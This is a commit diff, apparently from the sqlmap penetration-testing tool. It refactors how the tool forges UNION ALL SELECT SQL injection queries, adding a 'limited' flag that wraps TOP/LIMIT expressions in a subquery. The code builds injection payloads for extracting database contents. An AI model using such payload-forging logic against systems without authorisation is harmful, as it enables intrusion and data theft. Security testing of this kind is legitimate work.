improvement for limited queries (more stable to have TOP/LIMIT/OFFSET mechanisms as part of a subquery)

2024-11-22 09:36:35 +03:00 · 2011-07-31 23:40:09 +00:00 · 2011-07-31 23:40:09 +00:00 · 018d7ed646
commit 018d7ed646
parent 0627bb02cb
2 changed files with 12 additions and 13 deletions
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@ -522,7 +522,7 @@ class Agent:

        return concatenatedQuery

-    def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, multipleUnions=None):
+    def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, multipleUnions=None, limited=False):
        """
        Take in input an query (pseudo query) string and return its
        processed UNION ALL SELECT query.
@ -558,17 +558,16 @@ class Agent:

        inbandQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix)

-        if query.startswith("TOP"):
-            # TOP enumeration on DBMS.MSSQL is too specific and it has to go
-            # into its own brackets because those NULLs cause problems with
-            # ORDER BY clause
-            if Backend.isDbms(DBMS.MSSQL):
-                inbandQuery += ",".join(map(lambda x: char if x != position else '(SELECT %s)' % query, range(0, count)))
-                inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
+        if limited:
+            inbandQuery += ",".join(map(lambda x: char if x != position else '(SELECT %s)' % query, range(0, count)))
+            inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
+            inbandQuery += FROM_TABLE.get(Backend.getIdentifiedDbms(), "")

-                return inbandQuery
+            return inbandQuery

-            topNum = re.search("\ATOP\s+([\d]+)\s+", query, re.I).group(1)
+        topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
+        if topNumRegex:
+            topNum = topNumRegex.group(1)
            query = query[len("TOP %s " % topNum):]
            inbandQuery += "TOP %s " % topNum

--- a/lib/techniques/union/use.py
+++ b/lib/techniques/union/use.py
@ -47,7 +47,7 @@ from lib.utils.resume import resume

 reqCount = 0

-def __oneShotUnionUse(expression, unpack=True):
+def __oneShotUnionUse(expression, unpack=True, limited=False):
    global reqCount

    check = "(?P<result>%s.*%s)" % (kb.misc.start, kb.misc.stop)
@ -64,7 +64,7 @@ def __oneShotUnionUse(expression, unpack=True):

    # Forge the inband SQL injection request
    vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
-    query = agent.forgeInbandQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5])
+    query = agent.forgeInbandQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], None, limited)
    payload = agent.payload(newValue=query, where=where)

    # Perform the request
@ -299,7 +299,7 @@ def unionUse(expression, unpack=True, dump=False):
                        output = resume(limitedExpr, None)

                        if not output:
-                            output = __oneShotUnionUse(limitedExpr, unpack)
+                            output = __oneShotUnionUse(limitedExpr, unpack, True)

                        if not kb.threadContinue:
                            break